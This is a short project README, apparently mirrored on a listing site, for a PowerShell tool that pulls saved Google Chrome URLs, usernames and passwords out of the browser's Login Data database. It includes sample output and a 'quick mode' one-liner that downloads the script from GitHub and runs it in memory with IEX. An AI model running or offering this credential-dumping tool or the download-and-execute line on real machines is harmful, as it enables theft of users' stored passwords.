Get ChromePasswords Save

Get chrome passwords from chrome database in powershell

Project README

Get-ChromePasswords

.Synopsis
  Quickly retrieve Google Chrome passwords using powershell (please note this creates sqlite assemblies in your temp directory)

.PARAMETER Path
  
  The optional path to a non-standard database location for the Google Chrome Login Data database.  Generally found at '<APPDATA>\Local\Google\Chrome\Default\Login Data'

.EXAMPLE
  PS> .\Get-ChromePasswords

  Url                                                                                                    Username                  Password
  ---                                                                                                    --------                  --------
  https://accounts.google.com/signin/challenge/sl/password                                               user1                     password
  ...

Quick mode...

  PS C:\> IEX((new-object net.webclient).downloadstring("https://raw.githubusercontent.com/et0x/Get-ChromePasswords/master/Get-ChromePasswords.ps1"))
Open Source Agenda is not affiliated with "Get ChromePasswords" Project. README Source: et0x/Get-ChromePasswords
Stars
29
Open Issues
4
Last Commit
4 years ago

Open Source Agenda Badge

Open Source Agenda Rating